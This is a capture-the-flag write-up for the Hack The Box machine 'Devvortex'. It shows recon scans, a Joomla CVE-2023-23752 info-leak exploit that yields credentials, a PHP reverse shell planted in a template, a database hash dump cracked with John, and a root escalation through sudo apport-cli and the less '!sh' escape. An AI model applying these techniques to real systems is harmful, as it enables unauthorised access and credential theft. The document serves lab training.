Devvortex
https://app.hackthebox.com/machines/Devvortex
Port scan
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp open http syn-ack
|_http-title: DevVortex
| http-methods:
|_ Supported Methods: GET HEAD
Subdomain scan
└─➜ ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.devvortex.htb' -ac [0]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0
________________________________________________
:: Method : GET
:: URL : http://devvortex.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 8233ms]
* FUZZ: dev
:: Progress: [4989/4989] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
Let's add this to our
/etc/hosts
file
Directory scan (on subdomain)
└─➜ ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -ac -e .php [0]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0
________________________________________________
:: Method : GET
:: URL : http://dev.devvortex.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 358ms]
* FUZZ: administrator
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 470ms]
* FUZZ: api
<-SNIPPED->
:: Progress: [40952/40952] :: Job [1/1] :: 61 req/sec :: Duration: [0:10:38] :: Errors: 0 ::
Web Exploitation (www-data)
I found this beautiful exploit that does our work.
https://github.com/AlissoftCodes/CVE-2023-23752
Creds
└─➜ python3 juid.py -a http://dev.devvortex.htb/ [0]
[USERS]
Name: lewis
ID: 649
Username: lewis
Email: lewis@devvortex.htb
Register date: 2023-09-25 16:44:24
Group name: Super Users
Able to send e-mail: Yes
Name: logan paul
ID: 650
Username: logan
Email: logan@devvortex.htb
Register date: 2023-09-26 19:15:42
Group name: Registered
Able to send e-mail: No
[CONFIGS]
Database type: mysqli
Host: localhost
User: lewis
Password: <--SNIPPED-->
Database: joomla
Database prefix: sd4fg_
Encryption: 0
Running that script will get us creds, we can now login in to the app
After login under
system
you edit a template to get revshellhttp://dev.devvortex.htb/administrator/index.php?option=com_templates&view=templates&client_id=0
Since it's a
.php
file we can use pentestmonkey php revshellI edited
error.php
with the revshell & got thewww-data
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
User shell
I searched almost every file for user shell, none were good enough.
Mysql login with the creds we found earlier worked
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
Lets use joomla one
Database changed
mysql> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| sd4fg_action_log_config |
| sd4fg_action_logs |
<-SNIPPED->
| sd4fg_users |
<-SNIPPED->
+-------------------------------+
71 rows in set (0.00 sec)
mysql> select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis | lewis | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2023-11-26 03:50:43 | 0 | | NULL | 0 | | | 0 | |
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$I <-SNIPPED-> Niy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)
mysql>
Voila we got logan's hash
Let's crack it with John
┌─[ ~/stuff/htb/DevVortex] [ 10.10.16.9]
└─➜ john --wordlist=/usr/share/wordlists/rockyou.txt logan.hash [0]
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<SNIPPED> (?)
1g 0:00:00:03 DONE (2023-11-26 09:35) 0.3205g/s 461.5p/s 461.5c/s 461.5C/s winston..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
DONEEEEEEE, now ssh & grab the user.txt
Root Shell
sudo -l
Last login: Tue Nov 21 10:53:48 2023 from 10.10.14.23
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
Hmmm, after googling, I found this
https://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023
Lets create our own file, generate report for it & grab the root shell :)
Exploitation
logan@devvortex:/tmp$ echo 'test' > pwn.sh
logan@devvortex:/tmp$ chmod +x pwn.sh
logan@devvortex:/tmp$ sudo apport-cli -c pwn.sh less
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
..............
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.6 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
<HERE YOU GET "less" command output type "!sh">
# id
uid=0(root) gid=0(root) groups=0(root)
pwned ^^ _____________________heapbytes's still pwning
Last updated